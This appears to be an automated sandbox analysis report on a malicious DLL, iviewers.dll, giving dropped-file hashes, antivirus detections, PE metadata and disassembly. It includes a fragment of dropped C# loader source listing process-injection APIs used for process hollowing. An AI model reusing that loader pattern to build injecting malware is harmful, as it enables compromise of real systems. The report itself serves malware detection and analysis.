                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_je24ojuw.55i.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwx3qzyv.t05.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_of3ltesb.5wm.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pwmbwp.lov.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4jm5slq.m0t.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3gihop.uqt.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5ultme0.dys.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wziv4tn2.r2d.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zribzx3o.hyc.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.093040645438358
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTBYGak7YnqqIBYXPN5Dlq5J:+RI+ycuZhNAGakSRXPNnqX
                                                                                              MD5:F5CA51FC9523508B1EF469FACB273447
                                                                                              SHA1:2664BB6F79870A37482C80C6D58AB641D65E8A70
                                                                                              SHA-256:894ACEFADFD22D49A2FFD39D398EE1BFD62BD77B9DDD0E306139A507D76A63DC
                                                                                              SHA-512:C5262E179DB92ABDA841FC9077EC1717AE4AD851BCFD42200E63B2FC6E037BCE7E15B20C39F996A5EE87320AB8D58304B18443FE451CE58C2E40BF843412A962
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.z.l.e.s.m.v.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                                              C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):4.981572627372863
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fskcRxzxszIwkn23fskcRa9n:p37L/6KRfqLQfqmn
                                                                                              MD5:4502961F20A8F56646955494FA14B9AF
                                                                                              SHA1:DF394000003DD37C78868284BA45493DC127FBF0
                                                                                              SHA-256:56213DE7FAFB2C10283CB3EF373FAFF9A0E4B0620B46D4B8F427FB29865D9C47
                                                                                              SHA-512:637533032C9620223C11738D6E8BA27F1BBC0EB6AFC22548039EF7969036582E6D0B3F0F73DCAEA35CD3E5B26425AF3F06B26074BF47010196228C26AA4617AD
                                                                                              Malicious:false
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.627872387962876
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdcRjOaYcUxRa95MqBY8eN45f:RNxNc9Oc+a95MqqS5f
                                                                                              MD5:ACE8EF044737FCF97039852D733F5AE3
                                                                                              SHA1:213D250E2B344119C40D62611DFF833C37902A39
                                                                                              SHA-256:82AD91F503399083E2C308F6FF38A236D905FBB4BC5020DE03BDC8FBD2D28757
                                                                                              SHA-512:E12F101A5BB30896EE5E7AD22ABC63D4D17DC4B8A677B38829AA79A1F30161E15584555E695482B18EF48BDFA1254A540885182025946294F6D64CCBFB350F24
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5og...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

                                                                                              C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.out

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.218250753632092
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfqLQfqmuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfNfOKax5DqBVKVrdFAMBJTH
                                                                                              MD5:A7819E3DDC559A0431EECB20908A17A8
                                                                                              SHA1:B1CAF3808FAF629198315EE9CEF0924C709A0F13
                                                                                              SHA-256:532613AFE6906545190F32CB2FD52BB3DA3B34C9FA276A43AF122335FD58B417
                                                                                              SHA-512:7B06C6326F23F8B613AC27886F10E21C3BE1E4FD8A2F4ED439C6AD943913643F4B9E904CA53D213113912A056395CD18B5F729D668E1D6306E3A2D022103DBCE
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.121861019873163
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+6ak7Ynqq1LPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                              MD5:21A83360B4C67E2B7FFD9951F6A04ABE
                                                                                              SHA1:025455979FBC91A46C05FD812AC6160157E8F64E
                                                                                              SHA-256:9B6AB46FAE3D09313519765389C6E19D2F81F92E6513254F4E491DD9DD73524C
                                                                                              SHA-512:5CD47F0250834559201174AAA31AC718D9DEE38B251CBE2FB637F3DEB9D5469F5DBEA23525A05AD3C20455DA4D478F857189E705C67E3BEFD4397C0AB3D056D1
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.y.q.5.a.k.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                              C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.0.cs

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):11063
                                                                                              Entropy (8bit):4.547000581752388
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo66T:2oYLoH97t/Z7pgjvzf5XT
                                                                                              MD5:FAC8F0E634D8D7975A6EDC045D89AE09
                                                                                              SHA1:DD06BCC32B91D9635BFA317A5213E3C5EE86D2A0
                                                                                              SHA-256:6F5BD7F4EE85C3181E111CDC470E434875BADEDC87EFC056B8EDF5CD494FBFB2
                                                                                              SHA-512:C8D77D5FA969CC6668C25331B5933C8B98DEDEF9C2DD9DA345C3CF89D96C05CC20953486E9185390501245A12AFB5CF9F37C1B627AECE6D797F0F354F6E27CD5
                                                                                              Malicious:false
                                                                                              Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                                              C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):204
                                                                                              Entropy (8bit):5.085985031413143
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2L/6K2wkn23fpMZzxszIwkn23fpMEn:p37L/6KRfRMZQfRME
                                                                                              MD5:2B57CC6CE02A0FE003D45C6F57D9A7DA
                                                                                              SHA1:B66012F5613C999F2B2FDC0CF7852CA5F8CBC1C8
                                                                                              SHA-256:F4631C5FB45E114AD547653BACE82F40F123CDE9601BB1B26147312BA6F726E9
                                                                                              SHA-512:5125B8CDF158B897FC4D3895AF87F50C86E005AA57B5472EF97D18029627BD416887D126392A4FBE40749EBF71A10B72BA6EF37444363E2F66456D64CDA8FF16
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9728
                                                                                              Entropy (8bit):4.63185595537278
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:GRH6HN4QhfNQ8q8888yYAdYRjOavUxRa95MqBYTeN45H:RNxNY9OA+a95MqvS5H
                                                                                              MD5:3B544DD59F291106A62C5CA101E23D7B
                                                                                              SHA1:0AB3C4D9880F5A986BBBE81C249725AD8C2C237C
                                                                                              SHA-256:8DF2F1DD4D1E0F478D9CCF9A68382ECB0EAE49FF266636D8AABBB05231BAC6BB
                                                                                              SHA-512:59473DC8EE71614D2D16691E5D4DEAFA78722167F614EE18ADCBAF043B87582C2677A0983892F2D7E849DC48EB071090D326EC1709337BE91F338B7B165679A4
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5og...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

                                                                                              C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.out

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):702
                                                                                              Entropy (8bit):5.278197588577375
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/qR37L/6KRfRMZQfRMRKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfFf2Kax5DqBVKVrdFAMBJTH
                                                                                              MD5:3A53923E12A627E26752D5DC61D86A01
                                                                                              SHA1:DB1FF4322408C5E08B3C4D607B6183FD3AD72EEE
                                                                                              SHA-256:DA180690D5070D1B0D30F115E2465C006A82BC81BDC81DF36929080A4B8C0098
                                                                                              SHA-512:83721FD3205675604CD923A33D0D08108CB0D78DDB9B66078A66767753D5D59B42BA513D5FD69D580C8D689BB6FBE57E13C4DCA41F421BAFEA6C63DF8F3C8EC4
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.357910407078851
                                                                                              TrID:
                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:iviewers.dll
                                                                                              File size:93'184 bytes
                                                                                              MD5:690a4c9693ad790d6ee23492fe8bf869
                                                                                              SHA1:da39c94f65a34f2f2a72c6b2799f7d991a8c38d8
                                                                                              SHA256:320db923b7c701a6005e465a082ad48c2f3c8f36145ece15b4980a44202383fe
                                                                                              SHA512:17b3d9986e3e361f53ab69c35ab90412b93d2a53e1b5d0bd86bec7fb44af45d67f8c47acf03091285d2bed3952b5b72e986e949dbad9b130cad90bafd5671833
                                                                                              SSDEEP:1536:riUKaJeTUBp7KGhioxKLpBbIrta1Z9PvoNkM/6Mox/j1k+sWlzMcdbvcUCZ2M:rioJ9MGQoIHbvZ93oNkXjuQzNbvcUCZ2
                                                                                              TLSH:16935A11B5D1C071E6BF193E08649AB48B3FB810DF61ADEB279416AE4F302C1DE35D6A
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..L...L...L....h..G....h.......h..X....h..O...L........e..\....e..X....e..n....e..M....e..M....e..M...RichL..................

                                                                                              File Icon

                                                                                              Icon Hash:7ae282899bbab082

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x1000206a
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x10000000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                              Time Stamp:0x676B4EEE [Wed Dec 25 00:16:46 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:3be2261fa076757c8bb359470b1d32fd

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                              jne 00007FF89C8285D7h
                                                                                              call 00007FF89C828798h
                                                                                              push dword ptr [ebp+10h]
                                                                                              push dword ptr [ebp+0Ch]
                                                                                              push dword ptr [ebp+08h]
                                                                                              call 00007FF89C828483h
                                                                                              add esp, 0Ch
                                                                                              pop ebp
                                                                                              retn 000Ch
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 0Ch
                                                                                              lea ecx, dword ptr [ebp-0Ch]
                                                                                              call 00007FF89C8280F5h
                                                                                              push 10015694h
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              push eax
                                                                                              call 00007FF89C82948Eh
                                                                                              int3
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 0Ch
                                                                                              lea ecx, dword ptr [ebp-0Ch]
                                                                                              call 00007FF89C82799Dh
